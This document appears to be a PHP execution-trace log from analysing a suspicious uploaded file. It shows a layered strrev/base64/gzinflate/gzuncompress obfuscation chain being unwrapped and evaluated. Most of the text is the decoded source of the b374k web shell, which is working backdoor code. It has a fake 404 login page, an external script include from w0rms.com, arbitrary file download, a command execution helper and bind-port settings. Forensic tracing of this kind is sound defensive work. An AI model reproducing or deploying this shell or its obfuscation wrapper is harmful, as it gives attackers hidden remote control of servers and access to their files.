1		A						/var/www/html/uploads/nasi.php.suspected	3	$gzinflate = '==gUvWNlt4nBt8C/8QwxBckuNdbLJs6ILukjeYxHrkvmvnU4xzdVAu1vWRoDOZb6pTEB9le7vGPB+oUB1thTmsHe44NtyXkySc6Mfb1xWfdgblCCZdORfQUE9VayDcRdjDJv/Qxg3A91eucd1LejBOIFLbaZ6iwWg6utvWrqk5e4zL833/2LjGNx2hr4K1sguEadsDAR7wmcdMyJjp1hZ7eypjsla+tZHS/CBV/YkMY5qWDPwRXf2O7byPupteBywmOGaFfMKrF6yLBEdY6JGltEO5dBWDid4yVXjpf72ixq2zEbBv80mwgLnuPyadOng0IVlgQqncFqEXMjh5CuQWQwLg4bRk+Lkn+Fcd002y4bvB9OcyPl3RvTUs6qruoFDqQQJFrg6naeguRo3Oe/tlnJCqUsJH+FTpIa7CahxobhVxs2+CsoBFWZYzhKLvq0OhCJRAKQU+tnpj+20FL4Ev11CVJR6w2IQ1f19KY5tu4o7hRLbnrm1b/zY6djv15G'
2	4	0	0.001181	529672	base64_decode	0		/var/www/html/uploads/nasi.php.suspected	4	1	'ZXZhbCUyOCUyNnF1b3QlM0IlM0YlMjZndCUzQiUyNnF1b3QlM0IuZ3p1bmNvbXByZXNzJTI4Z3p1bmNvbXByZXNzJTI4Z3ppbmZsYXRlJTI4Z3ppbmZsYXRlJTI4Z3ppbmZsYXRlJTI4YmFzZTY0X2RlY29kZSUyOHN0cnJldiUyOCUyNGd6aW5mbGF0ZSUyOSUyOSUyOSUyOSUyOSUyOSUyOSUyOSUzQg=='
2	4	1	0.001204	529960
2	4	R			'eval%28%26quot%3B%3F%26gt%3B%26quot%3B.gzuncompress%28gzuncompress%28gzinflate%28gzinflate%28gzinflate%28base64_decode%28strrev%28%24gzinflate%29%29%29%29%29%29%29%29%3B'
2	5	0	0.001226	529928	urldecode	0		/var/www/html/uploads/nasi.php.suspected	4	1	'eval%28%26quot%3B%3F%26gt%3B%26quot%3B.gzuncompress%28gzuncompress%28gzinflate%28gzinflate%28gzinflate%28base64_decode%28strrev%28%24gzinflate%29%29%29%29%29%29%29%29%3B'
2	5	1	0.001245	530184
2	5	R			'eval(&quot;?&gt;&quot;.gzuncompress(gzuncompress(gzinflate(gzinflate(gzinflate(base64_decode(strrev($gzinflate))))))));'
2	6	0	0.001264	529896	htmlspecialchars_decode	0		/var/www/html/uploads/nasi.php.suspected	4	1	'eval(&quot;?&gt;&quot;.gzuncompress(gzuncompress(gzinflate(gzinflate(gzinflate(base64_decode(strrev($gzinflate))))))));'
2	6	1	0.001372	530120
2	6	R			'eval("?>".gzuncompress(gzuncompress(gzinflate(gzinflate(gzinflate(base64_decode(strrev($gzinflate))))))));'
2	7	0	0.001409	532264	eval	1	'eval("?>".gzuncompress(gzuncompress(gzinflate(gzinflate(gzinflate(base64_decode(strrev($gzinflate))))))));'	/var/www/html/uploads/nasi.php.suspected	4	0
3	8	0	0.001428	532264	strrev	0		/var/www/html/uploads/nasi.php.suspected(4) : eval()'d code	1	1	'==gUvWNlt4nBt8C/8QwxBckuNdbLJs6ILukjeYxHrkvmvnU4xzdVAu1vWRoDOZb6pTEB9le7vGPB+oUB1thTmsHe44NtyXkySc6Mfb1xWfdgblCCZdORfQUE9VayDcRdjDJv/Qxg3A91eucd1LejBOIFLbaZ6iwWg6utvWrqk5e4zL833/2LjGNx2hr4K1sguEadsDAR7wmcdMyJjp1hZ7eypjsla+tZHS/CBV/YkMY5qWDPwRXf2O7byPupteBywmOGaFfMKrF6yLBEdY6JGltEO5dBWDid4yVXjpf72ixq2zEbBv80mwgLnuPyadOng0IVlgQqncFqEXMjh5CuQWQwLg4bRk+Lkn+Fcd002y4bvB9OcyPl3RvTUs6qruoFDqQQJFrg6naeguRo3Oe/tlnJCqUsJH+FTpIa7CahxobhVxs2+CsoBFWZYzhKLvq0OhCJRAKQU+tnpj+20FL4Ev11CVJR6w2IQ1f19KY5tu4o7hRLbnrm1b/zY6djv15G'
3	8	1	0.001578	667464
3	8	R			'AEiAt38AR4C4fwBCgL1/eJwAQoC9f3ic7P15d+JI0igO/119Tn8HNeMZ7HGVEZttqsruZl8MmH3r7uujDRBowUisM30/+xuRKQmJxQbbNc+d3/tUdxUgZUZGRkbGkhkZ+f3XyXDC/PzTzz8F/smctyWeqQ8lRWH48E1kzEzDAiuGRYZfMUt/ULsJC+a/RanPzRSTmXCG8dXH0KeyrjG+C+afAQB1xs3M4RO+Zu4YX0y4ZbmgxAncdSwmhfrCNR+LRW5Cwf7tDRvmBd83rCLoij7F4n9j2X6fZelTq6knjjZwx/gzsiIZJU7z4/vf4L2sSef+erqYearEGzn/Z+bpKZMvpp+eLrCE3D9nDHM60Y3zs6d6utZK13735xqNylMTfj3Fs+lyw//nZ39W1weK5L9gfrm7Y/qcYkjMBfMvAMDAn6HEidL0nNQLBK9YJsJGmLJuMhl9pol+0hCWk5ayid//QtQMyTAA5yfD5KbmOSnzmzSd6tOnqTTRp6asDc5Z'
3	9	0	0.001691	667432	base64_decode	0		/var/www/html/uploads/nasi.php.suspected(4) : eval()'d code	1	1	'AEiAt38AR4C4fwBCgL1/eJwAQoC9f3ic7P15d+JI0igO/119Tn8HNeMZ7HGVEZttqsruZl8MmH3r7uujDRBowUisM30/+xuRKQmJxQbbNc+d3/tUdxUgZUZGRkbGkhkZ+f3XyXDC/PzTzz8F/smctyWeqQ8lRWH48E1kzEzDAiuGRYZfMUt/ULsJC+a/RanPzRSTmXCG8dXH0KeyrjG+C+afAQB1xs3M4RO+Zu4YX0y4ZbmgxAncdSwmhfrCNR+LRW5Cwf7tDRvmBd83rCLoij7F4n9j2X6fZelTq6knjjZwx/gzsiIZJU7z4/vf4L2sSef+erqYearEGzn/Z+bpKZMvpp+eLrCE3D9nDHM60Y3zs6d6utZK13735xqNylMTfj3Fs+lyw//nZ39W1weK5L9gfrm7Y/qcYkjMBfMvAMDAn6HEidL0nNQLBK9YJsJGmLJuMhl9pol+0hCWk5ayid//QtQMyTAA5yfD5KbmOSnzmzSd6tOnqTTRp6asDc5Z'
3	9	1	0.002110	802632
3	9	R			'\000H��\000G��\000B��x�\000B��x��yw�H�(\016�]}N\a5�\031�q�\021�m���f_\f�}���\r\020h�H�3}?�\033�)\t��\006�5ϝ�Tw\025 eFFFFƒ\031\031����p����?\005�ɜ�%��\017%Ea��Md�L�\002+�E�_1KP�\t\v�E���\024��p����Ч��1�\v�\001\000u����\023�f�\030_L�e���\t�u,&���5\037�EnB���\r\033�\005�7�"�>��c�~�e�S��\'�6p�3�"\031%N���ཬI�z��y��\0339�g��)�/���.���?g\fs:э�z��J�~��\032��S\023~=ų�r��gV�\a��`~��c��bH�\005�/\000����ĉ���\v\004�X&�F��n2\031}��~�\020������B�\f�0\000�\'���9)�4��ӧ�4ѧ��\r�Y�X��\'C2�'
3	10	0	0.003874	667432	gzinflate	0		/var/www/html/uploads/nasi.php.suspected(4) : eval()'d code	1	1	'\000H��\000G��\000B��x�\000B��x��yw�H�(\016�]}N\a5�\031�q�\021�m���f_\f�}���\r\020h�H�3}?�\033�)\t��\006�5ϝ�Tw\025 eFFFFƒ\031\031����p����?\005�ɜ�%��\017%Ea��Md�L�\002+�E�_1KP�\t\v�E���\024��p����Ч��1�\v�\001\000u����\023�f�\030_L�e���\t�u,&���5\037�EnB���\r\033�\005�7�"�>��c�~�e�S��\'�6p�3�"\031%N���ཬI�z��y��\0339�g��)�/���.���?g\fs:э�z��J�~��\032��S\023~=ų�r��gV�\a��`~��c��bH�\005�/\000����ĉ���\v\004�X&�F��n2\031}��~�\020������B�\f�0\000�\'���9)�4��ӧ�4ѧ��\r�Y�X��\'C2�'
3	10	1	0.005833	769864
3	10	R			'\000G��\000B��x�\000B��x��yw�H�(\016�]}N\a5�\031�q�\021�m���f_\f�}���\r\020h�H�3}?�\033�)\t��\006�5ϝ�Tw\025 eFFFFƒ\031\031����p����?\005�ɜ�%��\017%Ea��Md�L�\002+�E�_1KP�\t\v�E���\024��p����Ч��1�\v�\001\000u����\023�f�\030_L�e���\t�u,&���5\037�EnB���\r\033�\005�7�"�>��c�~�e�S��\'�6p�3�"\031%N���ཬI�z��y��\0339�g��)�/���.���?g\fs:э�z��J�~��\032��S\023~=ų�r��gV�\a��`~��c��bH�\005�/\000����ĉ���\v\004�X&�F��n2\031}��~�\020������B�\f�0\000�\'���9)�4��ӧ�4ѧ��\r�Y�X��\'C2��\017�'
3	11	0	0.007595	634664	gzinflate	0		/var/www/html/uploads/nasi.php.suspected(4) : eval()'d code	1	1	'\000G��\000B��x�\000B��x��yw�H�(\016�]}N\a5�\031�q�\021�m���f_\f�}���\r\020h�H�3}?�\033�)\t��\006�5ϝ�Tw\025 eFFFFƒ\031\031����p����?\005�ɜ�%��\017%Ea��Md�L�\002+�E�_1KP�\t\v�E���\024��p����Ч��1�\v�\001\000u����\023�f�\030_L�e���\t�u,&���5\037�EnB���\r\033�\005�7�"�>��c�~�e�S��\'�6p�3�"\031%N���ཬI�z��y��\0339�g��)�/���.���?g\fs:э�z��J�~��\032��S\023~=ų�r��gV�\a��`~��c��bH�\005�/\000����ĉ���\v\004�X&�F��n2\031}��~�\020������B�\f�0\000�\'���9)�4��ӧ�4ѧ��\r�Y�X��\'C2��\017�'
3	11	1	0.009365	737096
3	11	R			'\000B��x�\000B��x��yw�H�(\016�]}N\a5�\031�q�\021�m���f_\f�}���\r\020h�H�3}?�\033�)\t��\006�5ϝ�Tw\025 eFFFFƒ\031\031����p����?\005�ɜ�%��\017%Ea��Md�L�\002+�E�_1KP�\t\v�E���\024��p����Ч��1�\v�\001\000u����\023�f�\030_L�e���\t�u,&���5\037�EnB���\r\033�\005�7�"�>��c�~�e�S��\'�6p�3�"\031%N���ཬI�z��y��\0339�g��)�/���.���?g\fs:э�z��J�~��\032��S\023~=ų�r��gV�\a��`~��c��bH�\005�/\000����ĉ���\v\004�X&�F��n2\031}��~�\020������B�\f�0\000�\'���9)�4��ӧ�4ѧ��\r�Y�X��\'C2��\017����bq�-<'
3	12	0	0.011123	634664	gzinflate	0		/var/www/html/uploads/nasi.php.suspected(4) : eval()'d code	1	1	'\000B��x�\000B��x��yw�H�(\016�]}N\a5�\031�q�\021�m���f_\f�}���\r\020h�H�3}?�\033�)\t��\006�5ϝ�Tw\025 eFFFFƒ\031\031����p����?\005�ɜ�%��\017%Ea��Md�L�\002+�E�_1KP�\t\v�E���\024��p����Ч��1�\v�\001\000u����\023�f�\030_L�e���\t�u,&���5\037�EnB���\r\033�\005�7�"�>��c�~�e�S��\'�6p�3�"\031%N���ཬI�z��y��\0339�g��)�/���.���?g\fs:э�z��J�~��\032��S\023~=ų�r��gV�\a��`~��c��bH�\005�/\000����ĉ���\v\004�X&�F��n2\031}��~�\020������B�\f�0\000�\'���9)�4��ӧ�4ѧ��\r�Y�X��\'C2��\017����bq�-<'
3	12	1	0.012913	737096
3	12	R			'x�\000B��x��yw�H�(\016�]}N\a5�\031�q�\021�m���f_\f�}���\r\020h�H�3}?�\033�)\t��\006�5ϝ�Tw\025 eFFFFƒ\031\031����p����?\005�ɜ�%��\017%Ea��Md�L�\002+�E�_1KP�\t\v�E���\024��p����Ч��1�\v�\001\000u����\023�f�\030_L�e���\t�u,&���5\037�EnB���\r\033�\005�7�"�>��c�~�e�S��\'�6p�3�"\031%N���ཬI�z��y��\0339�g��)�/���.���?g\fs:э�z��J�~��\032��S\023~=ų�r��gV�\a��`~��c��bH�\005�/\000����ĉ���\v\004�X&�F��n2\031}��~�\020������B�\f�0\000�\'���9)�4��ӧ�4ѧ��\r�Y�X��\'C2��\017����bq�-<"%\f���'
3	13	0	0.014710	634664	gzuncompress	0		/var/www/html/uploads/nasi.php.suspected(4) : eval()'d code	1	1	'x�\000B��x��yw�H�(\016�]}N\a5�\031�q�\021�m���f_\f�}���\r\020h�H�3}?�\033�)\t��\006�5ϝ�Tw\025 eFFFFƒ\031\031����p����?\005�ɜ�%��\017%Ea��Md�L�\002+�E�_1KP�\t\v�E���\024��p����Ч��1�\v�\001\000u����\023�f�\030_L�e���\t�u,&���5\037�EnB���\r\033�\005�7�"�>��c�~�e�S��\'�6p�3�"\031%N���ཬI�z��y��\0339�g��)�/���.���?g\fs:э�z��J�~��\032��S\023~=ų�r��gV�\a��`~��c��bH�\005�/\000����ĉ���\v\004�X&�F��n2\031}��~�\020������B�\f�0\000�\'���9)�4��ӧ�4ѧ��\r�Y�X��\'C2��\017����bq�-<"%\f���'
3	13	1	0.016599	737096
3	13	R			'x��yw�H�(\016�]}N\a5�\031�q�\021�m���f_\f�}���\r\020h�H�3}?�\033�)\t��\006�5ϝ�Tw\025 eFFFFƒ\031\031����p����?\005�ɜ�%��\017%Ea��Md�L�\002+�E�_1KP�\t\v�E���\024��p����Ч��1�\v�\001\000u����\023�f�\030_L�e���\t�u,&���5\037�EnB���\r\033�\005�7�"�>��c�~�e�S��\'�6p�3�"\031%N���ཬI�z��y��\0339�g��)�/���.���?g\fs:э�z��J�~��\032��S\023~=ų�r��gV�\a��`~��c��bH�\005�/\000����ĉ���\v\004�X&�F��n2\031}��~�\020������B�\f�0\000�\'���9)�4��ӧ�4ѧ��\r�Y�X��\'C2��\017����bq�-<"%\f���*�|���0C:'
3	14	0	0.018429	634664	gzuncompress	0		/var/www/html/uploads/nasi.php.suspected(4) : eval()'d code	1	1	'x��yw�H�(\016�]}N\a5�\031�q�\021�m���f_\f�}���\r\020h�H�3}?�\033�)\t��\006�5ϝ�Tw\025 eFFFFƒ\031\031����p����?\005�ɜ�%��\017%Ea��Md�L�\002+�E�_1KP�\t\v�E���\024��p����Ч��1�\v�\001\000u����\023�f�\030_L�e���\t�u,&���5\037�EnB���\r\033�\005�7�"�>��c�~�e�S��\'�6p�3�"\031%N���ཬI�z��y��\0339�g��)�/���.���?g\fs:э�z��J�~��\032��S\023~=ų�r��gV�\a��`~��c��bH�\005�/\000����ĉ���\v\004�X&�F��n2\031}��~�\020������B�\f�0\000�\'���9)�4��ӧ�4ѧ��\r�Y�X��\'C2��\017����bq�-<"%\f���*�|���0C:'
3	14	1	0.021321	986952
3	14	R			'<?php \r\n\r\n/* (Web Shell b374k r3c0d3d by x\'1n73ct|default pass:" 1n73ction ") */ \r\n$auth_pass = "9c80a1eaca699e2fc6b994721f8703bc"; \r\n$color = "#00ff00"; \r\n$default_action = \'FilesMan\'; \r\n@define(\'SELF_PATH\', __FILE__); \r\nif( strpos($_SERVER[\'HTTP_USER_AGENT\'],\'Google\') !== false ) { \r\n    header(\'HTTP/1.0 404 Not Found\'); \r\n    exit; \r\n} \r\n@session_start(); \r\n@error_reporting(0); \r\n@ini_set(\'error_log\',NULL); \r\n@ini_set(\'log_errors\',0); \r\n@ini_set(\'max_executio'
3	15	0	0.026559	1962656	eval	1	'?><?php \r\n\r\n/* (Web Shell b374k r3c0d3d by x\'1n73ct|default pass:" 1n73ction ") */ \r\n$auth_pass = "9c80a1eaca699e2fc6b994721f8703bc"; \r\n$color = "#00ff00"; \r\n$default_action = \'FilesMan\'; \r\n@define(\'SELF_PATH\', __FILE__); \r\nif( strpos($_SERVER[\'HTTP_USER_AGENT\'],\'Google\') !== false ) { \r\n    header(\'HTTP/1.0 404 Not Found\'); \r\n    exit; \r\n} \r\n@session_start(); \r\n@error_reporting(0); \r\n@ini_set(\'error_log\',NULL); \r\n@ini_set(\'log_errors\',0); \r\n@ini_set(\'max_execution_time\',0);\r\n@ini_set(\'output_buffering\',0); \r\n@ini_set(\'display_errors\', 0);\r\n@set_time_limit(0); \r\n@set_magic_quotes_runtime(0); \r\n@define(\'VERSION\', \'2.1\'); \r\nif( get_magic_quotes_gpc() ) { \r\n    function stripslashes_array($array) { \r\n        return is_array($array) ? array_map(\'stripslashes_array\', $array) : stripslashes($array); \r\n    } \r\n    $_POST = stripslashes_array($_POST); \r\n} \r\nfunction printLogin() { \r\n    ?> \r\n<SCRIPT SRC=http://w0rms.com/sayac.js></SCRIPT>\r\n<h1>Not Found</h1> \r\n<p>The requested URL was not found on this server.</p> \r\n<hr> \r\n<address>Apache Server at <?=$_SERVER[\'HTTP_HOST\']?> Port 80</address> \r\n    <style> \r\n        input { margin:0;background-color:#fff;border:1px solid #fff; } \r\n    </style> \r\n    <center> \r\n    <form method=post> \r\n    <input type=password name=pass> \r\n    </form></center> \r\n    <?php \r\n    exit; \r\n} \r\nif( !isset( $_SESSION[md5($_SERVER[\'HTTP_HOST\'])] )) \r\n    if( empty( $auth_pass ) || \r\n        ( isset( $_POST[\'pass\'] ) && ( md5($_POST[\'pass\']) == $auth_pass ) ) ) \r\n        $_SESSION[md5($_SERVER[\'HTTP_HOST\'])] = true; \r\n    else \r\n        printLogin();\r\n\t\t\r\n@ini_set(\'log_errors\',0);\r\n@ini_set(\'output_buffering\',0);\t\r\nif(isset($_GET[\'dl\']) && ($_GET[\'dl\'] != "")){\r\n\t$file = $_GET[\'dl\'];\r\n\t$filez = @file_get_contents($file);\r\n   header("Content-type: application/octet-stream"); \r\n   header("Content-length: ".strlen($filez)); \r\n   header("Content-disposition: attachment; filename=\\"".basename($file)."\\";");\r\n   echo $filez; \r\n    exit; \r\n}\r\nelseif(isset($_GET[\'dlgzip\']) && ($_GET[\'dlgzip\'] != "")){\r\n\t$file = $_GET[\'dlgzip\'];\r\n\t$filez = gzencode(@file_get_contents($file));\r\n   header("Content-Type:application/x-gzip\\n"); \r\n   header("Content-length: ".strlen($filez)); \r\n   header("Content-disposition: attachment; filename=\\"".basename($file).".gz\\";");\r\n   echo $filez; \r\n    exit; \r\n}\r\n// view image\r\nif(isset($_GET[\'img\'])){\r\n\t\t@ob_clean(); \r\n\t\t$d = magicboom($_GET[\'y\']);\r\n\t\t$f = $_GET[\'img\'];\r\n\t\t$inf = @getimagesize($d.$f); \r\n   \t\t$ext = explode($f,"."); \r\n   \t\t$ext = $ext[count($ext)-1]; \r\n   \t \t@header("Content-type: ".$inf["mime"]);\r\n   \t \t@header("Cache-control: public"); \r\n  \t\t@header("Expires: ".date("r",mktime(0,0,0,1,1,2030))); \r\n  \t\t@header("Cache-control: max-age=".(60*60*24*7));  \r\n   \t \t@readfile($d.$f); \r\n   \t \texit; \r\n}\r\n\r\n// server software\r\n$software = getenv("SERVER_SOFTWARE");\r\n// check safemode\r\nif (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on")  $safemode = TRUE; else $safemode = FALSE;\r\n// uname -a\r\n$system = @php_uname();\r\n// mysql\r\nfunction showstat($stat) {if ($stat=="on") {return "<b><font style=\'color:#00FF00\'>ON</font></b>";}else {return "<b><font style=\'color:#DD4736\'>OFF</font></b>";}}\r\nfunction testmysql() {if (function_exists(\'mysql_connect\')) {return showstat("on");}else {return showstat("off");}}\r\nfunction testcurl() {if (function_exists(\'curl_version\')) {return showstat("on");}else {return showstat("off");}}\r\nfunction testwget() {if (exe(\'wget --help\')) {return showstat("on");}else {return showstat("off");}}\r\nfunction testperl() {if (exe(\'perl -h\')) {return showstat("on");}else {return showstat("off");}}\r\n// check os\r\nif(strtolower(substr($system,0,3)) == "win") $win = TRUE;\r\nelse $win = FALSE; \r\n// change directory\r\nif(isset($_GET[\'y\'])){\r\n\tif(@is_dir($_GET[\'view\'])){\r\n\t\t$pwd = $_GET[\'view\'];\r\n\t\t@chdir($pwd);\r\n\t}\r\n\telse{\r\n\t\t$pwd = $_GET[\'y\'];\r\n\t\t@chdir($pwd);\r\n\t}\r\n}\r\n//hdd\r\nfunction convertByte($s) {\r\nif($s >= 1073741824)\r\nreturn sprintf(\'%1.2f\',$s / 1073741824 ).\' GB\';\r\nelseif($s >= 1048576)\r\nreturn sprintf(\'%1.2f\',$s / 1048576 ) .\' MB\';\r\nelseif($s >= 1024)\r\nreturn sprintf(\'%1.2f\',$s / 1024 ) .\' KB\';\r\nelse\r\nreturn $s .\' B\';\r\n}\r\n\r\n// username, id, shell prompt and working directory\r\nif(!$win){\r\n\tif(!$user = rapih(exe("whoami"))) $user = "";\r\n\tif(!$id = rapih(exe("id"))) $id = "";\r\n\t$prompt = $user." \\$ ";\r\n\t$pwd = @getcwd().DIRECTORY_SEPARATOR;\r\n}\r\nelse {\r\n\t$user = @get_current_user();\r\n\t$id = $user;\r\n\t$prompt = $user." &gt;";\r\n\t$pwd = realpath(".")."\\\\";\r\n\t// find drive letters\r\n \t$v = explode("\\\\",$d); \r\n\t$v = $v[0]; \r\n \tforeach (range("A","Z") as $letter) \r\n \t{ \r\n\t  $bool = @is_dir($letter.":\\\\");\r\n\t  if ($bool) \r\n\t  { \r\n \t\t  $letters .= "<a href=\\"?y=".$letter.":\\\\\\">[ ";\r\n\t\t   if ($letter.":" != $v) {$letters .= $letter;} \r\n\t\t   else {$letters .= "<span class=\\"gaya\\">".$letter."</span>";} \r\n\t\t   $letters .= " ]</a> "; \r\n  \t  }\t \r\n } \r\n}\r\n\r\nfunction testoracle() {\r\n    if (function_exists(\'ocilogon\')) { return showstat("on"); }\r\n    else { return showstat("off"); }\r\n    }\r\n\r\nfunction testmssql() {\r\n    if (function_exists(\'mssql_connect\')) { return showstat("on"); }\r\n    else { return showstat("off"); }\r\n    }\r\n\r\n function showdisablefunctions() {\r\n    if ($disablefunc=@ini_get("disable_functions")){ return "<span style=\'color:\'><font color=#DD4736><b>".$disablefunc."</b></font></span>"; }\r\n    else { return "<span style=\'color:#00FF1E\'><b>NONE</b></span>"; }\r\n    }\r\n\t\r\nif(function_exists("posix_getpwuid") && function_exists("posix_getgrgid")) $posix = TRUE;\r\nelse $posix = FALSE;\r\n// server ip\r\n$server_ip = @gethostbyname($_SERVER["HTTP_HOST"]);\r\n// your ip ;-)\r\n$my_ip = $_SERVER[\'REMOTE_ADDR\'];\r\n$admin_id=$_SERVER[\'SERVER_ADMIN\'];\r\n$bindport = "13123";\r\n$bindport_pass = "b374k";\r\n\r\n// separate the working direcotory\r\n$pwds = explode(DIRECTORY_SEPARATOR,$pwd);\r\n$pwdurl = "";\r\nfor($i = 0 ; $i < sizeof($pwds)-1 ; $i++){\r\n\t$pathz = "";\r\n\tfor($j = 0 ; $j <= $i ; $j++){\r\n\t\t$pathz .= $pwds[$j].DIRECTORY_SEPARATOR;\r\n\t}\r\n\t$pwdurl .= "<a href=\\"?y=".$pathz."\\">".$pwds[$i]." ".DIRECTORY_SEPARATOR." </a>";\r\n}\r\n\t\r\n// rename file or folder\r\nif(isset($_POST[\'rename\'])){\r\n\t$old = $_POST[\'oldname\'];\r\n\t$new = $_POST[\'newname\'];\r\n\t@rename($pwd.$old,$pwd.$new);\r\n\t$file = $pwd.$new;\r\n}\r\nif(isset($_POST[\'chmod\'])){ \r\n\t$name = $_POST[\'name\'];\r\n\t$value = $_POST[\'newvalue\'];\r\nif (strlen($value)==3){\r\n\t$value = 0 . "" . $value;}\r\n\t@chmod($pwd.$name,octdec($value));\r\n\t$file = $pwd.$name;}\r\n\t\r\nif(isset($_POST[\'chmod_folder\'])){\r\n\t$name = $_POST[\'name\'];\r\n\t$value = $_POST[\'newvalue\'];\r\nif (strlen($value)==3){\r\n\t$value = 0 . "" . $value;}\r\n\t@chmod($pwd.$name,octdec($value));\r\n\t$file = $pwd.$name;}\r\n\r\n\r\n// print useful info\r\n$buff  = "Software : <b>".$software."</b><br />";\r\n$buff .= "System OS : <b>".$system."</b><br />";\r\nif($id != "") $buff .= "ID : <b>".$id."</b><br />";\r\n$buff .= "PHP Version : <b>".phpversion()."</b> on <b>".php_sapi_name()."</b><br />";\r\n$buff .= "Server ip : <b>".$server_ip."</b> <span class=\\"gaya\\"> | </span> Your   ip : <b>".$my_ip."</b><span class=\\"gaya\\"> | </span> Admin : <b>".$admin_id."</b><br />";\r\n$buff .= "Free Disk: "."<span style=\'color:#00FF1E\'><b>".convertByte(disk_free_space("/"))." / ".convertByte(disk_total_space("/"))."</b></span><br />";\r\nif($safemode) $buff .= "Safemode: <span class=\\"gaya\\"><b>ON</b></span><br />";\r\nelse $buff .= "Safemode: <span class=\\"gaya\\"><b>OFF</b></span><br />";\r\n$buff .= "Disabled Functions: ".showdisablefunctions()."<br />";\r\n$buff .= "MySQL: ".testmysql()."&nbsp;|&nbsp;MSSQL: ".testmssql()."&nbsp;|&nbsp;Oracle: ".testoracle()."&nbsp;|&nbsp;Perl: ".testperl()."&nbsp;|&nbsp;cURL: ".testcurl()."&nbsp;|&nbsp;WGet: ".testwget()."<br>";\r\n$buff .= "<font color=00ff00 ><b>".$letters."&nbsp;&gt;&nbsp;".$pwdurl."</b></font>";\r\n\r\n\r\n\r\n\r\nfunction rapih($text){\r\n\treturn trim(str_replace("<br />","",$text));\r\n}\r\n\r\nfunction magicboom($text){\r\n\tif (!get_magic_quotes_gpc()) {\r\n   \t\t return $text;\r\n\t} \r\n\treturn stripslashes($text);\r\n}\r\n\r\nfunction showdir($pwd,$prompt){\r\n\t$fname = array();\r\n\t$dname = array();\r\n\tif(function_exists("posix_getpwuid") && function_exists("posix_getgrgid")) $posix = TRUE;\r\n\telse $posix = FALSE;\r\n\t$user = "????:????";\r\n\tif($dh = @scandir($pwd)){\r\n\t\tforeach($dh as $file){\r\n\t\t\tif(is_dir($file)){\r\n\t\t\t\t$dname[] = $file;\r\n\t\t\t}\r\n\t\t\telseif(is_file($file)){\r\n\t\t\t\t$fname[] = $file;\r\n\t\t\t}\r\n\t\t}\r\n\t}\r\n\telse{\r\n\t\tif($dh = @opendir($pwd)){\r\n\t\t\twhile($file = @readdir($dh)){\r\n\t\t\t\tif(@is_dir($file)){\r\n\t\t\t\t\t$dname[] = $file;\r\n\t\t\t\t}\r\n\t\t\t\telseif(@is_file($file)){\r\n\t\t\t\t\t$fname[] = $file;\r\n\t\t\t\t}\r\n\t\t\t}\r\n\t\t\t@closedir($dh);\r\n\t\t}\r\n\t}\r\n\r\n\t\r\n\tsort($fname);\r\n\tsort($dname);\r\n\t$path = @explode(DIRECTORY_SEPARATOR,$pwd);\r\n\t$tree = @sizeof($path);\r\n\t$parent = "";\r\n\t$buff = "\r\n\t<form action=\\"?y=".$pwd."&amp;x=shell\\" method=\\"post\\" style=\\"margin:8px 0 0 0;\\">\r\n\t<table class=\\"cmdbox\\" style=\\"width:50%;\\">\r\n\t<tr><td><b>$prompt</b></td><td><input onMouseOver=\\"this.focus();\\" id=\\"cmd\\" class=\\"inputz\\" type=\\"text\\" name=\\"cmd\\" style=\\"width:400px;\\" value=\\"\\" /><input class=\\"inputzbut\\" type=\\"submit\\" value=\\"Go !\\" name=\\"submitcmd\\" style=\\"width:80px;\\" /></td></tr>\r\n\t</form>\r\n\t<form action=\\"?\\" method=\\"get\\" style=\\"margin:8px 0 0 0;\\">\r\n\t<input type=\\"hidden\\" name=\\"y\\" value=\\"".$pwd."\\" />\r\n\t<tr><td><b>view file/folder</b></td><td><input onMouseOver=\\"this.focus();\\" id=\\"goto\\" class=\\"inputz\\" type=\\"text\\" name=\\"view\\" style=\\"width:400px;\\" value=\\"".$pwd."\\" /><input class=\\"inputzbut\\" type=\\"submit\\" value=\\"View !\\" name=\\"submitcmd\\" style=\\"width:80px;\\" /></td></tr>\r\n\t</form></table><table class=\\"explore\\">\r\n\t<tr><th>name</th><th style=\\"width:80px;\\">size</th><th style=\\"width:210px;\\">owner:group</th><th style=\\"width:80px;\\">perms</th><th style=\\"width:110px;\\">modified</th><th style=\\"width:190px;\\">actions</th></tr>\r\n\t";\r\n\tif($tree > 2) for($i=0;$i<$tree-2;$i++) $parent .= $path[$i].DIRECTORY_SEPARATOR;\r\n\telse $parent = $pwd;  \r\n\r\n\tforeach($dname as $folder){\r\n\t\tif($folder == ".") {\r\n\t\t\tif(!$win && $posix){\r\n\t\t\t\t$name=@posix_getpwuid(@fileowner($folder));\r\n\t\t\t\t$group=@posix_getgrgid(@filegroup($folder));\r\n\t\t\t\t$owner = $name[\'name\']."<span class=\\"gaya\\"> : </span>".$group[\'name\'];\r\n\t\t\t}\r\n\t\t\telse {\r\n\t\t\t\t$owner = $user;\r\n\t\t\t}\r\n\t\t\t$buff .= "<tr><td><a href=\\"?y=".$pwd."\\">$folder</a></td><td>LINK</td>\r\n\t\t\t<td style=\\"text-align:center;\\">".$owner."</td><td><center>".get_perms($pwd)."</center></td>\r\n\t\t\t<td style=\\"text-align:center;\\">".date("d-M-Y H:i",@filemtime($pwd))."</td><td><span id=\\"titik1\\">\r\n\t\t\t<a href=\\"?y=$pwd&amp;edit=".$pwd."newfile.php\\">newfile</a> | <a href=\\"javascript:tukar(\'titik1\',\'titik1_form\');\\">newfolder</a></span>\r\n\t\t\t<form action=\\"?\\" method=\\"get\\" id=\\"titik1_form\\" class=\\"sembunyi\\" style=\\"margin:0;padding:0;\\">\r\n\t\t\t<input type=\\"hidden\\" name=\\"y\\" value=\\"".$pwd."\\" />\r\n\t\t\t<input class=\\"inputz\\" style=\\"width:140px;\\" type=\\"text\\" name=\\"mkdir\\" value=\\"a_new_folder\\" />\r\n\t\t\t<input class=\\"inputzbut\\" type=\\"submit\\" name=\\"rename\\" style=\\"width:35px;\\" value=\\"Go !\\" />\r\n\t\t\t</form></td>\r\n\t\t\t\r\n\t\t\t</tr>\r\n\t\t\t";\r\n\t\t}\r\n\t\telseif($folder == "..") {\r\n\t\t\tif(!$win && $posix){\r\n\t\t\t\t$name=@posix_getpwuid(@fileowner($folder));\r\n\t\t\t\t$group=@posix_getgrgid(@filegroup($folder));\r\n\t\t\t\t$owner = $name[\'name\']."<span class=\\"gaya\\"> : </span>".$group[\'name\'];\r\n\t\t\t}\r\n\t\t\telse {\r\n\t\t\t\t$owner = $user;\r\n\t\t\t}\r\n\t\t\t$buff .= "<tr><td><a href=\\"?y=".$parent."\\"><img 